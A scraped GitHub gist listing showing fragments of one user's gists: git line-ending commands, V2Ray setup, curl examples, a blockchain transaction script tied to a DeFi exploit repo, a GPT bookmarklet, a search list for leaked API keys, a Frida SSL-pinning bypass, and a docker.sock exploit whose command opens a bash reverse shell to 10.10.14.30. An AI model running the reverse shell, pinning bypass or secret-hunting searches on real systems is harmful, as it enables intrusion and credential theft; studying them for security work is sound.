git ls-files -z | xargs -0 dos2unix
git ls-files -z | xargs -0 unix2dos
git ls-files -z '*.sln' '*.bat' | xargs -0 unix2dos
SanariSan
/ git repos convert crlf-lf only commited files.md
Last active
August 2, 2023 05:51
V2Ray 4.45.2 ( https://github.com/v2fly/v2ray-core/releases/tag/v4.45.2 )
/usr/bin/v2ray = symbolic | v2ray -> /usr/share/v2ray/v2ray*
sudo ln -s /usr/share/v2ray/v2ray /usr/bin/v2ray
touch /etc/systemd/system/[email protected]
[Unit]
SanariSan
/ curl.md
Created
February 4, 2023 19:48
— forked from subfuzion/curl.md
curl POST examples
SanariSan
/ BscRawTx.ts
Created
February 10, 2023 14:26
— forked from WP-LKL/BscRawTx.ts
Binance Smart Chain transaction using web3 and ethereumjs with custom chain and commandline for python.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Ex. $ npx ts-node BscRawTx.ts --txData=<txData> | |
| // Consult: https://github.com/WP-LKL/bscValueDefi-Exploit, for python use-case | |
| const Tx = require('ethereumjs-tx').Transaction; | |
| const Web3 = require('web3'); | |
| import Common from 'ethereumjs-common'; | |
| import {parse} from 'ts-command-line-args'; | |
| interface input { | |
| txData: string; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ssh to server | |
| # --- | |
| # add new user | |
| sudo adduser user | |
| # sudo cp /etc/sudoers /etc/sudoers.bak | |
| # echo "user ALL=(ALL) ALL" | sudo tee -a /etc/sudoers | |
| # or |
SanariSan
/ bookmarklet.js
Created
March 24, 2023 17:48
— forked from andyg2/bookmarklet.js
Bookmark-let to summarize a web page using GPT-3 - written by GPT-3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript: (function () { | |
| var text = document.body.innerText; | |
| var spl = text.split(" "); | |
| if (spl.length > 3000) { | |
| text = spl.slice(0, 3000).join(" "); | |
| } | |
| fetch('https://api.openai.com/v1/completions', { | |
| method: 'POST', | |
| headers: { |
SanariSan
/ GitHub-Leaked-API-Keys-and-Secrets.md
Created
October 12, 2023 14:34
— forked from win3zz/GitHub-Leaked-API-Keys-and-Secrets.md
As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.
(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
**1.
SanariSan
/ mixunpin.js
Created
November 2, 2023 22:03
— forked from incogbyte/mixunpin.js
Frida script to bypass common methods of sslpining Android
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log("[*] SSL Pinning Bypasses"); | |
| console.log(`[*] Your frida version: ${Frida.version}`); | |
| console.log(`[*] Your script runtime: ${Script.runtime}`); | |
| /** | |
| * by incogbyte | |
| * Common functions | |
| * thx apkunpacker, NVISOsecurity, TheDauntless | |
| * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
| * !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
SanariSan
/ exploit-docker-sock.sh
Created
November 6, 2023 05:44
— forked from PwnPeter/exploit-docker-sock.sh
Exploit docker.sock to mount root filesystem in a container
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # you can see images availables with | |
| # curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | |
| # here we have sandbox:latest | |
| # command executed when container is started | |
| # change dir to tmp where the root fs is mount and execute reverse shell | |
| cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]" |
#Check if Ideapad_laptop kernel module is loaded
lsmod | grep ideapad_laptop
# 1 on, 0 off
cat /sys/bus/platform/drivers/ideapad_acpi/VPC2004:00/conservation_mode
echo 1 | sudo tee /sys/bus/platform/drivers/ideapad_acpi/VPC2004:00/conservation_mode
echo 0 | sudo tee /sys/bus/platform/drivers/ideapad_acpi/VPC2004:00/conservation_mode